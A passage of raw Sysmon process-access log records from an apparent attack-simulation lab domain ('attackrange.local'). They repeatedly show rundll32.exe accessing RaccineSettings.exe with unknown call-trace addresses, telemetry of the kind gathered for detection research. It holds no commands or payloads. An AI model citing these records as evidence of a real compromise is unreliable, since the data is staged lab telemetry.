Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003470Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003469Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003468Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003467Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003466Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003465Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003464Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003463Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003462Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003461Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003460Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003459Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003458Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003457Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003456Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003455Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003454Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003453Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003452Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003451Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003450Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003449Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003448Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003447Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003446Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003445Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003444Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003443Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003442Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003441Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003440Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003439Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003438Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003437Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003436Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003435Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003434Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003433Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003432Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003431Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003430Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003429Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003428Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003427Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003426Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003425Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003424Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003423Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003422Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003421Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003420Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003419Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003418Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003417Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003416Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003415Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003414Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003413Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003412Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003411Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003410Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003409Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003408Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003407Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.478{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 